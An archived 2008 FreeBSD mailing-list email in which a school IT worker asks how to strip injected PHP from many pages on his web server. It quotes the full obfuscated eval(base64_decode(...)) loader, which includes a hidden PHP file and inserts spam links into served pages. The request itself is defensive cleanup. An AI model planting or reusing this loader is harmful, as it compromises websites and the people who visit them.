From owner-freebsd-questions@FreeBSD.ORG  Thu Dec  4 12:32:01 2008
Return-Path: <owner-freebsd-questions@FreeBSD.ORG>
Delivered-To: freebsd-questions@freebsd.org
Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34])
	by hub.freebsd.org (Postfix) with ESMTP id 0D0801065673
	for <freebsd-questions@freebsd.org>;
	Thu,  4 Dec 2008 12:32:01 +0000 (UTC)
	(envelope-from mcoyles@horbury.wakefield.sch.uk)
Received: from smtp2-wak.yhgfl.net (smtp2-wak-ext.yhgfl.net [89.207.208.43])
	by mx1.freebsd.org (Postfix) with ESMTP id 9E7368FC13
	for <freebsd-questions@freebsd.org>;
	Thu,  4 Dec 2008 12:32:00 +0000 (UTC)
	(envelope-from mcoyles@horbury.wakefield.sch.uk)
Received: from horbury.wakefield.sch.uk ([10.126.96.34])
	by smtp2-wak.yhgfl.net (8.13.8/8.13.8/Debian-3) with ESMTP id
	mB4CF6I4029390
	for <freebsd-questions@freebsd.org>; Thu, 4 Dec 2008 12:15:07 GMT
Received: from ITTEAM02 [10.126.96.253] by horbury.wakefield.sch.uk with ESMTP
	(SMTPD32-7.07) id A9C528D0020; Thu, 04 Dec 2008 12:15:01 +0000
From: "Marc Coyles" <mcoyles@horbury.wakefield.sch.uk>
To: <freebsd-questions@freebsd.org>
Date: Thu, 4 Dec 2008 12:14:58 -0000
Message-ID: <002b01c95609$ed0c7200$c7255600$@wakefield.sch.uk>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook 12.0
Thread-Index: AclWCezrNx3MuBYcTUS+XfHfWuXp4g==
Content-Language: en-gb
X-YHGfL-MailScanner-Information: Please contact the YHGfL Foundation for more
	information
X-YHGfL-MailScanner: Found to be clean
X-YHGfL-MailScanner-MCPCheck: MCP-Clean, MCP-Checker (score=0, required 0.5)
X-YHGfL-MailScanner-SpamCheck: not spam, SpamAssassin (not cached,
	score=-4.399, required 5, autolearn=not spam, ALL_TRUSTED -1.80,
	BAYES_00 -2.60)
X-MailScanner-From: mcoyles@horbury.wakefield.sch.uk
Subject: Mass find/replace...
X-BeenThere: freebsd-questions@freebsd.org
X-Mailman-Version: 2.1.5
Precedence: list
Reply-To: mcoyles@horbury.wakefield.sch.uk
List-Id: User questions <freebsd-questions.freebsd.org>
List-Unsubscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-questions>, 
	<mailto:freebsd-questions-request@freebsd.org?subject=unsubscribe>
List-Archive: <http://lists.freebsd.org/pipermail/freebsd-questions>
List-Post: <mailto:freebsd-questions@freebsd.org>
List-Help: <mailto:freebsd-questions-request@freebsd.org?subject=help>
List-Subscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-questions>, 
	<mailto:freebsd-questions-request@freebsd.org?subject=subscribe>
X-List-Received-Date: Thu, 04 Dec 2008 12:32:01 -0000

Never had to do this so not sure where to start. Have googled and found
some solutions but they don't particularly work (see below)...

Someone has managed to inject php code into a PILE of php pages on my
webserver...

"<?
/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNz
ZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhp
c3RzKCcvaG9tZS9ob3JidXJ5L3B1YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRv
ci9mY2tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMv
aWNvbnMvMzIvbWRsX3V0Zi5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9ob3JidXJ5L3B1
YmxpY19odG1sL3N0cmljdC9tb2R1bGVzL2Zja2VkaXRvci9mY2tlZGl0b3IvZWRpdG9yL2Zp
bGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvbWRsX3V0Zi5waHAn
KTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcp
KXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgk
UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdB
MzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYw
NjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRS
MEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMw
ODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5
MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2
OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZE
QTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4
ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2
QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4
NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy
ODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigk
UjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdB
N0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2
NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31p
ZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdC
N0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFF
MzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMy
ODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUz
MTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNF
MDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0
dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29i
aCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQt
RW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6
ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0
Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXty
ZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwk
UjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCku
JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcp
O319fQ==')); ?>"

This basically brings up a pile of spam links.

I need to do a find / replace throughout the entire of the
/home/horbury/public_html directory...
I've tried 'find /home/Horbury/ -type f | xargs grep -l base64_decode'
to get a list of the files that require the operation performing, but it
comes up with an error (xargs: unterminated quote) after a few
results...

Any tips? Basically to find the above and remove it... otherwise I'll
have to resort to doing it in Dreamweaver and reuploading, which is a
major pita, or restoring from a backup (after working out when exactly
this happened and how - I'm guessing thru a teacher's out of date
wordpress install somewhere).

Marc A Coyles - Horbury School ICT Support Team
Mbl: 07850 518106
Land: 01924 282740 ext 730
Helpdesk: 01924 282740 ext 2000